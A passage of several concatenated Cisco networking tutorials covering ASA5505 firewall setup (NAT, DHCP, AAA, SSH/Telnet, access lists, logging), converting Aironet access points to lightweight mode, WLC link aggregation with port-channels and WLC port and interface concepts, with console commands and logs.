ASA5505(config)# access-list NAT-ACLs extended permit ip 10.76.0.0 255.255.255.0 any
ASA5505(config)# global (outside) 1 interface
INFO: outside interface address added to PAT pool
ASA5505(config)# nat (inside) 1 access-list NAT-ACLs

NAT with the use of access lists provides greater flexibility and control over which IP addresses or networks will use the NAT service.

With software version 8.3 and newer, things have changed dramatically and access lists are no longer used in the NAT configuration lines.

The new NAT format utilizes "object network", "object service" and "object-group network" statements to define the parameters of the NAT configuration.

The following commands (software version 8.3 and above) will provide NAT services to our internal networks so they can access the Internet:

ASA5505(config)# object network network1
ASA5505(config-network-object)# subnet 10.71.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface
!
ASA5505(config)# object network network2
ASA5505(config-network-object)# subnet 10.75.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface
!
ASA5505(config)# object network network3
ASA5505(config-network-object)# subnet 10.76.0.0 255.255.255.0
ASA5505(config-network-object)# nat (inside,outside) dynamic interface
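On software version 8.3 and above, the resulting translation rules and their hit counters can be reviewed with the show nat command:

ASA5505# show nat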

Configuring The ASA DHCP Server

The existence of a DHCP server is necessary in most cases as it helps manage the assignment of IP addresses to our internal hosts. The ASA Firewall can be configured to provide DHCP services to our internal network, a very handy and welcome feature.

Again, there are some limitations with the DHCP service configuration which vary with the ASA model used. On our ASA5505, the maximum number of IP addresses the DHCP pool can assign was just 128!

Note that the DHCP service can run on all ASA interfaces so it is necessary to specify which interface the DHCP configuration parameters are for:

ASA5505(config)# dhcpd address 10.71.0.50-10.71.0.200 inside
Warning, DHCP pool range is limited to 128 addresses, set address range as: 10.71.0.50-10.71.0.177
ASA5505(config)# dhcpd address 10.71.0.50-10.71.0.128 inside
ASA5505(config)# dhcpd dns 8.8.8.8 interface inside
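Note that the DHCP daemon must also be enabled on the interface before it starts serving clients, if this has not been done already:

ASA5505(config)# dhcpd enable inside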

Once configured, the DHCP service will begin working and assigning IP addresses to clients. The gateway IP address parameter is automatically provided to clients and does not need to be configured on the ASA Firewall appliance.

We can verify the DHCP service is working using the show dhcpd statistics command:

ASA5505(config)# show dhcpd statistics
DHCP UDP Unreachable Errors: 0
DHCP Other UDP Errors: 0
Address pools        1
Automatic bindings   1
Expired bindings     0
Malformed messages   0

 Message          Received
 BOOTREQUEST          0
 DHCPDISCOVER         1
 DHCPREQUEST          1
 DHCPDECLINE          0
 DHCPRELEASE          0
 DHCPINFORM           1

If required, we can clear the DHCP bindings (assigned IP addresses) using the clear dhcpd binding command.

Configure AAA Authentication For Local Database User Authentication

Configuring AAA authentication is always a good idea as it instructs the ASA Firewall which user database to use for the various services it's running. For example, we can tell the ASA Firewall to use a RADIUS server for VPN user authentication, but use its local database for telnet, SSH or HTTP (ASDM) management access to the Firewall appliance.

As mentioned, our example instructs the ASA Firewall to use its local database:

ASA5505(config)# aaa authentication telnet console LOCAL
ASA5505(config)# aaa authentication http console LOCAL
ASA5505(config)# aaa authentication ssh console LOCAL
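For the LOCAL database to authenticate anyone, at least one local user account must exist on the appliance. If one was not created earlier in the configuration, it can be added as follows (the username and password below are purely illustrative):

ASA5505(config)# username admin password Str0ngP@ss privilege 15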

Enable HTTP Management For Inside Interface

We now turn to the management settings of our ASA Firewall to enable and configure HTTP management. This will allow access to the Firewall’s management via the popular ASDM management application:

ASA5505(config)# http 10.71.0.0 255.255.255.0 inside
WARNING: http server is not yet enabled to allow ASDM access.
ASA5505(config)# http server enable

The above commands enable HTTP management on the ASA Firewall only for the network 10.71.0.0/24.

Enable SSH & Telnet Management For Inside & Outside Interfaces

Enabling SSH and Telnet access to the Cisco Firewall is pretty straightforward. We always recommend the use of SSH, especially when accessing the Firewall from public IPs. Telnet is also an option; however, keep in mind that telnet provides no security whatsoever, as all data (including usernames, passwords and configuration) is sent in clear text.

Before enabling SSH, we must generate RSA key pairs for identity certificates. Telnet does not require any such step as it does not provide any encryption or security:

ASA5505(config)# crypto key generate rsa modulus 1024
INFO: The name for the keys will be:
Keypair generation process begin. Please wait...
ASA5505(config)# ssh 10.71.0.0 255.255.255.0 inside
ASA5505(config)# ssh 200.200.90.5 255.255.255.255 outside
ASA5505(config)# telnet 10.71.0.0 255.255.255.0 inside

Note that the ASA Firewall appliance will only accept SSH connections from host 200.200.90.5 arriving on its public interface, while both SSH and telnet connections are permitted from network 10.71.0.0/24 on the inside interface.
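Optionally, SSH access can be tightened further by enforcing SSH version 2 and adjusting the idle timeout (the values shown are illustrative):

ASA5505(config)# ssh version 2
ASA5505(config)# ssh timeout 30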

Create, Configure & Apply TCP/UDP Object-Groups

An essential part of any firewall configuration is to define the Internet services our users will have access to. This is done either by creating a number of lengthy access lists for each protocol/service and then applying them to the appropriate interfaces, or by utilising ASA Firewall Object-Groups which are then referenced by the access lists. Using Object-Groups is easy and recommended as they provide a great deal of flexibility and ease of management.

The logic is simple: create your Object-Groups, insert the protocols and services required, and then reference them in the firewall access-lists. As a last step, we apply the access lists to the interfaces we need.

Let’s use an example to help visualise the concept. Our needs require us to create two Object-Groups, one for TCP and one for UDP services:

ASA5505(config)#object-group service Internet-udp udp
ASA5505(config-service)# description UDP Standard Internet Services
ASA5505(config-service)# port-object eq domain
ASA5505(config-service)# port-object eq ntp
ASA5505(config-service)# port-object eq isakmp
ASA5505(config-service)# port-object eq 4500
!
ASA5505(config-service)#object-group service Internet-tcp tcp
ASA5505(config-service)# description TCP Standard Internet Services
ASA5505(config-service)# port-object eq www
ASA5505(config-service)# port-object eq https
ASA5505(config-service)# port-object eq smtp
ASA5505(config-service)# port-object eq 465
ASA5505(config-service)# port-object eq pop3
ASA5505(config-service)# port-object eq 995
ASA5505(config-service)# port-object eq ftp
ASA5505(config-service)# port-object eq ftp-data
ASA5505(config-service)# port-object eq domain
ASA5505(config-service)# port-object eq ssh
ASA5505(config-service)# port-object eq telnet

Now we need to reference our two Object-groups using the firewall access lists. Here we can also define which networks will have access to the services listed in each Object-group:

ASA5505(config)# access-list inside-in remark -=[Access Lists For Outgoing Packets from Inside interface]=-
ASA5505(config)# access-list inside-in extended permit udp 10.71.0.0 255.255.255.0 any object-group Internet-udp
ASA5505(config)# access-list inside-in extended permit tcp 10.71.0.0 255.255.255.0 any object-group Internet-tcp
ASA5505(config)# access-list inside-in extended permit tcp 10.75.0.0 255.255.255.0 any object-group Internet-tcp
ASA5505(config)# access-list inside-in extended permit tcp 10.76.0.0 255.255.255.0 any object-group Internet-tcp

Note that the 10.71.0.0/24 network has access to the services in both Object-groups, while our other networks are restricted to only the services defined in the TCP Object-group. To appreciate how Object-groups help simplify access list management: without them, we would require 37 access list commands instead of just 4!
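Once traffic starts flowing, the hit counts on each access list entry can be examined to confirm the Object-groups are matching traffic as expected:

ASA5505# show access-list inside-in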

Configuration Of Access-Lists For ICMP Packets To The Internet

To complete our access list configuration we configure our ASA Firewall to allow ICMP echo packets (ping) to any destination, and their replies (echo-reply):

ASA5505(config)# access-list inside-in extended permit icmp 10.71.0.0 255.255.255.0 any
ASA5505(config)# access-list outside-in remark -=[Access Lists For Incoming Packets on OUTSIDE interface]=-
ASA5505(config)# access-list outside-in extended permit icmp any any echo-reply

Applying Firewall Access-Lists To ‘inside’ & ‘outside’ Interfaces

The last step in configuring our firewall rules involves applying the two access lists, inside-in & outside-in, to the appropriate interfaces. Once this step is complete the firewall rules are in effect immediately:

ASA5505(config)# access-group inside-in in interface inside
ASA5505(config)# access-group outside-in in interface outside

Configure Logging/Debugging Of Events & Errors

This last step in our ASA Firewall configuration guide enables logging and debugging so that we can easily trace events and errors. Enabling logging is highly recommended as it will certainly help troubleshoot the ASA Firewall when problems occur.

ASA5505(config)# logging buffered 7
ASA5505(config)# logging buffer-size 30000
ASA5505(config)# logging enable

The commands above enable logging at the debugging level (7) and set the logging buffer size in RAM to 30,000 bytes (~30 KB).
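As the sample output further below shows, timestamp logging is disabled by default; it can optionally be enabled so that every message carries a timestamp:

ASA5505(config)# logging timestamp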

Issuing the show log command will reveal a number of important logs including any packets that are processed or denied due to access-lists:

ASA5505(config)# show log
Syslog logging: enabled
    Facility: 20
    Timestamp logging: disabled
    Standby logging: disabled
    Debug-trace logging: disabled
    Console logging: disabled
    Monitor logging: disabled
    Buffer logging: level debugging, 39925 messages logged
    Trap logging: disabled
    History logging: disabled
    Device ID: disabled
    Mail logging: disabled
    ASDM logging: disabled
n" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54843 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54845 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54844 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54850 dst outside:10.0.0.10/139 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54843 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54845 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54844 dst outside:10.0.0.10/445 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny tcp src inside:10.71.0.50/54850 dst outside:10.0.0.10/139 by access-group "inside-in" [0x0, 0x0]
%ASA-4-106023: Deny udp src inside:10.71.0.50/137 dst outside:10.0.0.10/137 by access-group "inside-in" [0x0, 0x0]
%ASA-6-302014: Teardown TCP connection 4718 for outside:173.194.40.49/443 to inside:10.71.0.50/54803 duration 0:02:00 bytes 1554462 TCP FINs

Summary

This article serves as an introductory configuration guide for the Cisco ASA5500 series Firewall appliances. We covered all the commands required to get an ASA5500 Firewall working and servicing network clients, while also explaining in detail each command used during the configuration process.



Cisco WLC 9800-CL Download and Deployment Models

Complete Guide: How to Download & Deploy The Cisco 9800-CL Virtual Wireless Controller on VMware ESXi

This article covers the deployment of the Cisco WLC 9800-CL cloud-based controller on the VMware ESXi platform. We explain the CPU, RAM and storage requirements, provide URLs to easily download and install the WLC controller using the OVA template, select the appropriate WLC 9800 deployment size (small, medium, large) and help you understand and configure the different WLC VM network interfaces.


Introduction to the Cisco 9800 WLC Virtual Controller

Cisco released their next-generation 9800 series Wireless Controllers back in 2018, also offering a cloud-based version that supports VMware ESXi, Microsoft Hyper-V, Amazon AWS, Microsoft Azure, Google Cloud Platform (GCP), Ubuntu/Red Hat Enterprise Linux using KVM, and Cisco NFVIS environments.

The virtualized version of the WLC controller offers great flexibility for organizations while at the same time provides considerable savings thanks to its zero-price tag. Customers are able to freely download and deploy the appliance, with the only restriction being the AP licenses that need to be purchased as an ongoing subscription.

Virtualization offers additional benefits which include:

  • Hardware independence. No hardware is involved. Lead times for the hardware-based controllers can sometimes exceed 6-9 months depending on market demand and other circumstances.
  • Decreased cost. The VM option means organizations are saving 6-figure amounts for every 9800-40 or greater model they require. If you’re considering introducing High-Availability (HA), then the Cloud-based controller becomes a much cheaper architecture. Additional savings are added since Smartnet contracts for the hardware are not required.
  • Better utilization of virtualization infrastructure. Utilizing the existing virtualization platform increases its ROI.
  • Greater Deployment Flexibility. VMs allow you to easily move them from one physical server to another, even between different datacenters or physical locations.
  • Increased Redundancy & Backups. Backing up a VM is an easy and simple process. You can even use specialized free VM Backup tools for this process.

Cisco 9800 WLC Virtual Controller VMware ESXi Requirements

Deploying the WLC 9800-CL in an ESXi environment is, as you’ll discover, a simple process. Cisco provides a single OVA file package, roughly around 1.25GB in size:



Easily Convert Cisco Autonomous - Standalone AP to Lightweight Mode & Register it to a Cisco WLC Controller

This article explains how to convert a local or remote Autonomous / Standalone Cisco Aironet Access Point to Lightweight and register it to a Cisco WLC Controller. Included are detailed steps, commands, full text logs of the conversion process and screenshots to ensure an easy and successful upgrade - WLC registration.


Restrictions & Considerations when Converting Autonomous APs to Lightweight Mode

Converting an Autonomous AP to Lightweight mode is a straightforward process; however, it is important to keep a few things in mind before performing the conversion procedure, as there are some restrictions users should be aware of.

Depending on your level of experience, some of these notes/restrictions might be considered basic or redundant knowledge. For the sake of simplicity, we are presenting them in bullet format:

  • All Cisco lightweight access points are capable of supporting up to 16 BSSIDs per radio and a total of 16 WLANs per access point.
  • Access points converted to lightweight mode require a DHCP server to obtain an IP address and discover the WLC via DNS or IP broadcast.
  • Lightweight access points do not support Wireless Domain Services (WDS). All lightweight APs communicate with the WLC.
  • Lightweight AP console port provides read-only access to the AP.

The Different Type of Access Point Image Files (k9w8 & rcvk9w8)

Before we begin the conversion process it is necessary to download the CAPWAP software file that matches the Access Point to be converted. These files can be downloaded from Cisco’s website and usually require an active Smartnet contract. Alternatively, a search on the web might reveal other sources from which they can be downloaded.

There are two type of AP CAPWAP software files we can download and install:

  • Fully functional CAPWAP Image file (full image) – Identified by the k9w8 string in their filename and are usually large in size (10-20MB). Once loaded, the AP is able to join the WLC and download its configuration. Example file name: ap3g1-k9w8-tar.152-4.JB6.tar
  • Recovery mode CAPWAP Image file – Identified by the rcvk9w8 string in their filename. These are smaller in size (5-8MB) and used to help the AP boot and join the controller so it can then download the full image from the WLC. Example filename: ap3g1-rcvk9w8-tar.152-4.JB6.tar

Regardless of the type of image loaded during the conversion process, the AP will always download the full image from the WLC as soon as it joins. The only exception to this rule is when the fully functional CAPWAP image file loaded on the AP is the same version as the one contained in the WLC.

Cisco AP Autonomous to Lightweight Conversion Process

First download a fully functional or recovery mode CAPWAP file suitable for the AP model. In our example we will be converting a Cisco 3502 AP and decided to download the appropriate recovery mode file: ap3g1-rcvk9w8-tar.152-4.JB6.tar.

Since the AP will automatically download the full image from the WLC once it joins, using the recovery mode file will speed up the conversion process.

We’ll need to have an FTP server running so we can configure the AP to download the file from it.

STEP 1: Power up the Autonomous AP & configure an FTP server from where the AP will download the image

STEP 2: Connect the Autonomous AP to a network switch or directly to the workstation serving the AP image via an FTP server.

STEP 3: Configure the AP with an IP address appropriate for the network or set it to DHCP

In our example we configure the AP to obtain its IP address from a DHCP server:

ap(config)# interface bvi1
ap(config-if)# ip address dhcp
*Mar  1 00:27:53.248: %DHCP-6-ADDRESS_ASSIGN: Interface BVI1 assigned DHCP address 192.168.2.83, mask 255.255.255.0, hostname ap

The AP confirms once it has successfully obtained an IP address from the DHCP server.

Note: The BVI interface indicates that the Radio interface (e.g. Dot11Radio0) and Ethernet interface (e.g. GigabitEthernet0) are bridged (bridge-group x). If this is not the case for your AP, apply the configuration to the AP’s Ethernet interface.
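If no DHCP server is available, a static address can be assigned instead; a minimal sketch (the addresses and gateway below are illustrative):

ap(config)# interface bvi1
ap(config-if)# ip address 192.168.2.83 255.255.255.0
ap(config-if)# exit
ap(config)# ip default-gateway 192.168.2.1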

STEP 4: Configure the AP with the FTP user account credentials as configured on the FTP server. This will allow the AP to access and download the image file. Once configured, begin the software download procedure using the archive download-sw command.

cisco autonomous ap to lightweight conversion

Here is the complete text log of the procedure:

ap# configure terminal
ap(config)# ip ftp username admin
ap(config)# ip ftp password cisco1234
ap(config)# exit
ap# archive download-sw /force-reload /overwrite ftp://192.168.2.61/ap3g1-rcvk9w8-tar.152-4.JB6.tar
Mar  1 00:30:46.348: %SYS-5-CONFIG_I: Configured from console
Mar  1 00:30:50.563: Loading ap3g1-rcvk9w8-tar.152-4.JB6.tar
extracting info (264 bytes)!
Image info:
    Version Suffix: rcvk9w8-
    Image Name: ap3g1-rcvk9w8-mx
    Version Directory: ap3g1-rcvk9w8-mx
    Ios Image Size: 123392
    Total Image Size: 7936512
    Image Feature: WIRELESS LAN|LWAPP
    Image Family: AP3G1
    Wireless Switch Management Version: 7.6.100.0
MwarVersion:07066400.First AP Supported Version:07000000.
Image version check passed 
*Mar  1 00:30:46.348: Loading ap3g1-rcvk9w8-tar.152-4.JB6.tar
Extracting files...
ap3g1-rcvk9w8-mx/ (directory) 0 (bytes)
extracting ap3g1-rcvk9w8-mx/ap3g1-rcvk9w8-mx (121199 bytes)
extracting ap3g1-rcvk9w8-mx/ap3g1-boot-m_upg (393216 bytes)!!
extracting ap3g1-rcvk9w8-mx/u-boot.bin (393216 bytes)!
extracting ap3g1-rcvk9w8-mx/ap3g1-rcvk9w8-xx (7016987 bytes)!!!!!!!!!!!!!!!!!!!!!!!!!!!
extracting ap3g1-rcvk9w8-mx/info (264 bytes)
extracting ap3g1-rcvk9w8-mx/file_hashes (712 bytes)
extracting ap3g1-rcvk9w8-mx/final_hash (141 bytes)
extracting ap3g1-rcvk9w8-mx/img_sign_rel.cert (1375 bytes)
extracting ap3g1-rcvk9w8-mx/img_sign_rel_sha2.cert (1371 bytes)!
extracting info.ver (264 bytes)
[OK - 7946240/4096 bytes]
Deleting target version: flash:/ap3g1-rcvk9w8-mx...done.
Deleting current version: flash:/ap3g1-k9w7-mx.153-3.JF5...
Set booting path to recovery image: ''...done.
New software image installed in
Writing out the event log to flash:/event.log ...
flash:/ap3g1-rcvk9w8-mx
Configuring system to use new image...done.
Requested system reload in progress...
archive download: takes 221 seconds
*Mar  1 00:34:31.088: %DOT11-5-EXPECTED_RADIO_RESET: Restarting Radio interface Dot11Radio0 due to IOS reload
*Mar  1 00:34:31.088: %DOT11-5-EXPECTED_RADIO_RESET: Restarting Radio interface Dot11Radio1 due to IOS reload
*Mar  1 00:34:31.094: %SYS-5-RELOAD: Reload requested by Exec. Reload Reason: Reason unspecified.

The /force-reload parameter will automatically reload the AP as soon as the new software image is installed while the /overwrite parameter is required to replace the autonomous image with the CAPWAP image.

A console cable can be used for the conversion of local APs. Alternatively, SSH/Telnet can be used for the conversion of both local and remote APs.

Registering Cisco Lightweight AP to WLC Controller

Once the CAPWAP image has been successfully loaded on the AP, it reloads and begins searching for a WLC Controller to register with. As soon as the AP successfully registers with the WLC, it compares its image with that of the controller and, if different, begins to download and install the controller's image.

It is important to ensure there is an active DHCP server on the same VLAN/network as the AP to provide it with an IP address, subnet mask, gateway and DNS parameters. DNS parameters are not mandatory but will speed up the WLC discovery process if the DNS server contains an "A" resource record named "CISCO-CAPWAP-CONTROLLER" pointing to the WLC’s IP address.
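For reference, such a record simply resolves the well-known hostname to the controller's management IP address. In our lab, where the WLC sits at 192.168.50.5, the record would look roughly like this (the domain name is illustrative):

CISCO-CAPWAP-CONTROLLER.lab.local.   IN   A   192.168.50.5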

In the logs below we can see our AP searching for the WLC (Translating "CISCO-CAPWAP-CONTROLLER"...domain server) after its initial reload (we’ve just installed the recovery mode image). It then discovers the WLC (both WLC and AP are on the same VLAN), registers and downloads the WLC’s full CAPWAP image:

cisco autonomous ap to lightweight conversion - firmware download


 

Mar  1 00:00:41.806: %CDP_PD-2-POWER_LOW: All radios disabled - NEGOTIATED WS-C3560CX-12PC-S (0076.8697.b603)
*Mar  1 00:00:46.122: %DHCP-6-ADDRESS_ASSIGN: Interface BVI1 assigned DHCP address 192.168.50.12, mask 255.255.255.0, hostname APe05f.b9a7.e290
Translating "CISCO-CAPWAP-CONTROLLER"...domain server (8.8.8.8)
*Mar  1 00:00:57.113: %CAPWAP-3-ERRORLOG: Did not get log server settings from DHCP. (8.8.4.4)
*Mar  1 00:01:15.119: %CAPWAP-3-ERRORLOG: Could Not resolve CISCO-CAPWAP-CONTROLLER
*Mar  1 00:01:25.120: %CAPWAP-3-ERRORLOG: Go join a capwap controller
*Sep  6 09:54:05.000: %CAPWAP-5-DTLSREQSEND: DTLS connection request sent peer_ip: 192.168.50.5 peer_port: 5246
examining image...
extracting info (287 bytes)
Image info:
    Version Suffix: k9w8-.153-3.JD4
    Image Name: ap3g1-k9w8-mx.153-3.JD4
    Version Directory: ap3g1-k9w8-mx.153-3.JD4
    Ios Image Size: 9042432
    Total Image Size: 10138112
    Image Feature: WIRELESS LAN|LWAPP
    Image Family: AP3G1
    Wireless Switch Management Version: 8.3.112.0
Extracting files...
ap3g1-k9w8-mx.153-3.JD4/ (directory) 0 (bytes)
extracting ap3g1-k9w8-mx.153-3.JD4/u-boot.bin (393216 bytes)
*Sep  6 09:54:07.258: %CAPWAP-5-DTLSREQSUCC: DTLS connection created successfully peer_ip: 192.168.50.5 peer_port: 5246
<output omitted>

The following screenshot was taken after the AP joined the WLC and began automatically downloading the new image:

As soon as the AP downloads and installs the new image, it will automatically reload and register with the WLC again. At this point the AP is ready to be configured and used as required.

Finally, notice the date/time correction (*Sep  6 09:54:05.000) as soon as the AP registers with the WLC controller. This is the first indication it has registered correctly with the WLC at IP address 192.168.50.5.

Summary

This article showed how to convert an Autonomous or Standalone Cisco Access Point to Lightweight mode and join it to a Cisco WLC Controller. We covered the restrictions and considerations that apply during the AP conversion process and explained the difference between the fully functional CAPWAP (k9w8) and recovery mode CAPWAP (rcvk9w8) image files. Finally, we provided the necessary commands & tips to configure the AP, transfer the image and register it with the WLC.

 


Configuring Cisco WLC Link Aggregation (LAG) with Port-Channel EtherChannel. LAG Restrictions for WLC Models

Cisco Wireless Controllers (WLC) support the configuration of Link Aggregation (IEEE 802.3ad - LAG) which bundles the controller ports into a single port channel. This helps simplify the configuration of the WLC interface ports, increase available bandwidth between the wireless and wired network, provide load-balancing capabilities between physical WLC ports and increase port redundancy.

To learn more about WLC interfaces refer to our article Cisco WLC Interfaces, Ports & Their Functionality.

The diagram below shows an example of a WLC 2504 with ports P1 and P2 in a LAG configuration connecting to a Cisco Catalyst or Nexus switch. In the configuration below WLC ports P1 and P2 are aggregated to provide a total of 2Gbps bandwidth:

WLC LAG Configuration with Cisco Nexus and Catalyst Switch


Link Aggregation Restrictions - Considerations

While LAG is the preferred method of connecting the WLC to the network, there are, however, a number of restrictions we need to be aware of to ensure we don’t stumble into any unpleasant surprises.

  • On 2504 and 3504 WLCs you can bundle all 4 ports into a single link.
  • On 5508 WLC you can bundle up to 8 ports into a single link.
  • Link Aggregation Control Protocol (LACP) and the Cisco proprietary Port Aggregation Protocol (PAgP) are not supported by the WLC. The switch Port-Channel members must therefore be set to channel unconditionally (shown in the configuration below).
  • Only one LAG Group is supported per WLC, you can therefore connect a WLC only to one switch unless using VSS (Catalyst) or vPC (Nexus) technologies.
  • When LAG is enabled, if a single link fails, traffic is automatically switched to the other links.
  • After enabling LAG the WLC must be rebooted.
  • When enabling LAG, all dynamic AP manager interfaces and untagged interfaces will be deleted. (See related article WLC Interfaces – Logical Interfaces)
  • After enabling LAG, all Virtual Interfaces use the LAG interface. No backup port (under the Virtual Interface settings) is configurable:

WLC virtual interfaces with and without LAG port channel

Wireless Controller LAG Configuration – Enabling LAG

The first step is to enable LAG. Log into the WLC and click on the Advanced menu option (firmware v8 and above only). Next, select the Controller menu option, set the LAG Mode on next reboot option to Enabled and click on the Apply button:

How to enable LAG on Cisco WLC

At this point the WLC will pop up a warning window explaining the changes that are about to take place. As mentioned previously, all dynamic AP manager interfaces and untagged interfaces will be deleted. (See related article WLC Interfaces – Logical Interfaces to understand the implications):

WLC Configuration to enable LAG Support

Once we click on OK the WLC will proceed to enable LAG mode and present us with another notification requesting that we save the configuration and reboot the controller:

WLC LAG Mode Confirmation

Note: Ignore the DNS Server IP that was presented in our Lab environment.

Next, click on the Save Configuration button on the top right corner. To reboot the controller, click on Commands menu, select Reboot from the right menu column and finally click on the Reboot button on the right:

wlc 2504 reboot process

Click on OK in the popup message to confirm the reboot.

At this point the WLC will reboot and we won’t be able to ping or access the WLC web interface until we configure the switch. All access points and wireless networks will also be unavailable.

Configuring Switch Port-Channel to Support Link Aggregation

The Port-channel configuration is a straightforward process. It’s best to ensure all interfaces participating in the Port-channel are first set to their default configuration. This removes any existing configuration, minimizing errors during the switchport configuration process.

First remove existing configuration from the interfaces participating in the Port-channel (Gigabitethernet 0/6 & 0/7), then make them members of Port-channel 1. If the Port-channel doesn’t exist, it will be automatically created:

3560cx-HQ(config)# default interface range Gigabitethernet 0/6-7
3560cx-HQ(config)# interface range GigabitEthernet 0/6-7
3560cx-HQ(config-if-range)# channel-group 1 mode on

Creating a port-channel interface Port-channel 1
3560cx-HQ(config-if-range)# description WLC2504
3560cx-HQ(config-if-range)# switchport mode trunk
3560cx-HQ(config-if-range)# switchport trunk allowed vlan 2,15,16,22,26
3560cx-HQ(config-if-range)# no shutdown

Below is the complete Port-channel and interface configuration:

!
interface Port-channel1
description WLC2504
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
!
interface GigabitEthernet0/6
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet0/7
switchport trunk allowed vlan 2,15,16,22,26
switchport mode trunk
channel-group 1 mode on
!

Notice that the channel-group mode is set to on which enables Etherchannel without any LACP or PAgP support. This is because the WLC doesn’t support LACP or PAgP and requires a plain vanilla Etherchannel.

When connecting the WLC to a modular Catalyst or Nexus switch, it’s always advisable to use ports on different modules as this increases redundancy in the event of a module failure.

Finally, during the Port-channel configuration process, ensure that all VLANs used by the WLC controller and the wireless network are allowed on the trunk.

Once the configuration is complete, we should be able to ping and access the WLC again.

A simple show interface port-channel 1 will also confirm both configured links are up and we have a total bandwidth of 2Gbps:

3560cx-HQ# show interface port-channel 1

Port-channel1 is up, line protocol is up (connected)
Hardware is EtherChannel, address is 0076.8697.b607 (bia 0076.8697.b607)
Description: WLC2504
MTU 1500 bytes, BW 2000000 Kbit/sec, DLY 10 usec,
reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Full-duplex, 1000Mb/s, link type is auto, media type is unknown
input flow-control is off, output flow-control is unsupported
Members in this channel: Gi0/6 Gi0/7
ARP type: ARPA, ARP Timeout 04:00:00

<output omitted>

Additional useful commands that can be used to obtain more information on the Etherchannel are:

  • show etherchannel 1 summary
  • show etherchannel 1 status
  • show etherchannel 1 port-channel
  • show etherchannel 1 protocol

Summary

This article explained the advantages of Link Aggregation (LAG) and showed how to configure it on your Cisco WLC. We included a number of important LAG restrictions, noting those that apply to specific WLC models (2504, 5508 etc). Cisco switch port configuration using Port-channel interfaces was also included, along with an explanation of why a static Etherchannel must be used, as WLC LAG does not support LACP or PAgP. Finally, we included a number of useful commands to verify and troubleshoot Link Aggregation and Port-channel interfaces.


Cisco WLC Interfaces, Ports & Their Functionality. Understand How WLCs Work, Connect to the Network Infrastructure & Wi-Fi SSID/VLAN mappings

Our previous article introduced Cisco’s popular Wireless Controller (WLC) devices and examined their benefits to enterprise networks, the different models offered, and finally took a look at their friendly GUI interfaces. This article continues by explaining the purpose and functionality of each WLC interface (Management interface, Virtual interface, AP-Manager interface, Dynamic interfaces etc), each WLC port (Service port, Redundancy port, Distribution ports etc), how WLCs connect to the network infrastructure, VLAN requirements and the mapping of VLANs to SSIDs.

Users can freely download Cisco's WLC product portfolio in our Cisco's Wireless Controller Datasheets download section. The datasheets contain all currently available WLC models, brief specification overview/comparison and much more.

WLC Interface Concepts – Understanding Ports & Logical Interfaces

Every WLC is fitted with a number of ports (physical interfaces) and logical interfaces, all critical for the device’s proper operation and integration with the network infrastructure. It is important that engineers working with WLCs understand the purpose of each interface and how it should be used. This will help maximize the stability and scalability of any WLC deployment by correctly configuring all necessary interfaces and attached devices.

WLC Ports (Physical Interfaces)

We will now take a look at the different ports that can be found on WLCs and explain their purpose. Depending on the WLC model, some ports might or might not be present. The Console Port and Distribution System Ports are found on all WLCs.

Figure 1. Available Ports on a Cisco WLC 5500

Redundancy Port

This port is used for High-Availability (HA) deployment designs when there are two WLCs available. In this setup, both WLCs are physically connected with each other through the Redundant Port using an Ethernet cable. The redundancy port is used for configuration, operational data synchronization and role negotiation between the primary and secondary controllers.

The redundancy port checks for peer reachability by sending UDP keepalive messages every 100 milliseconds from the standby-hot WLC to the active WLC. Finally, the redundancy port’s IP address always begins with 169.254 (169.254.x.x).

Service Port

The service port is used for out-of-band management of the controller and system recovery and maintenance in the event of a network failure. It is important to note that the service port does not support VLAN trunking or VLAN tagging and is therefore required to connect to an access port on the switch.

It is also recommended not to connect the service port to the same VLAN as the wired clients network because by doing so, administrators will not be able to access the management interface (analysed later) of the controller.

SFP/Ethernet Distribution System Ports

The distribution system ports are the most important ports on the WLC as they connect the internal logical interfaces (analysed below) and wireless client traffic to the rest of our network. High-end WLCs, such as the WLC 5500 series above, have multiple SFP-based distribution system ports allowing engineers to connect the WLC to the network backbone using different configurations. The SFP ports accept fiber optic or Ethernet copper connections, provided the appropriate SFP modules are used.

Figure 2. Picture of Fiber & Ethernet Copper SFPs

Lower-end WLCs such as the WLC2504 or the older WLC2100 series provide Ethernet interfaces only, because of the limited number of access points supported. For example, the WLC2504 provides up to 4 Gigabit Ethernet ports and can support up to 75 access points, while the WLC2125 provides up to 8 FastEthernet ports and supports up to 25 access points.

Figure 3. Pictures of WLC2504 & WLC2124

WLC Interfaces (logical Interfaces)

In this section, we will examine the logical interfaces that can be found on all WLCs. Understanding the functionality of each logical interface is crucial for the correct setup and deployment of any Cisco WLC-based wireless network.

The WLC’s logical interfaces are used to help manage the Wireless SSIDs broadcasted by the access points, manage the controller, access point and user data, plus more.

The diagram below provides a visual layout of the logical interfaces and how they connect to the physical ports of a WLC:

Figure 4. Cisco Wireless Controller Interfaces & Ports

The above layout shows how each Wireless SSID (WLAN 1, WLAN 2 etc) maps to a Dynamic interface. In turn, each Dynamic interface maps to a specific VLAN. The number of WLANs & Dynamic interfaces depends on the WLC model: the bigger the WLC model, the more SSIDs (wireless networks) and Dynamic interfaces it supports.

All Dynamic interfaces and AP-Manager/Manager interfaces connect to the network infrastructure via the Distribution ports which, depending on the WLC model, are SFP or Ethernet (10/100 or Gigabit) interfaces.

